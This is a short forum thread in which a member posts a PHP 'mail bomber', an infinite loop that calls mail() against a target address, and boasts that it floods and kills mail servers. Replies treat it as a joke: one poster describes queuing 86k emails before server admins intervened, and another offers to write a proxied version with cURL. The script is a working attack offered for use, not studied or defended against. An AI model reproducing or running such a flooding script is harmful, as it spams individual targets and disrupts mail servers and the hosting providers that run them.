Mail bomber made in PHP

Pie`

FS Member
PHP:
<?php
while(1) {
mail("THE PERSON TO MAILBOMB", "SUBJECT", "MESSAGE");
}
?>

Running that for ~10 secs will send about 15k emails. It kills mail servers very fast ;) but sends a heck of a lot of spam.
 
Hahaha wow, I'm sure this would be blocked on many servers.
 
The mail() function is on any server that has a mail server. It's just how many times in an hour your allowed to send a message.
 
Yeah, most servers would immediately terminate/suspend the account or highly limit it then a server op or network/datacenter op would delete it/account/unplug server.
 
I managed to queue up 86k emails before the server admins realised. (Oops ^_^) But my account was limited to 1k emails per hour, so many weren't sent.
 
Yeah exactly, a giant waste lol. Then you get fucked lol.
 
oh sorry, didn't notice the date of the posts.
well, was trying to hit the 50 count, and to be honest, i don't really think it's spamming :)

i could pretty much write up a mailbomber with proxy using cURL here.
 
Back
Top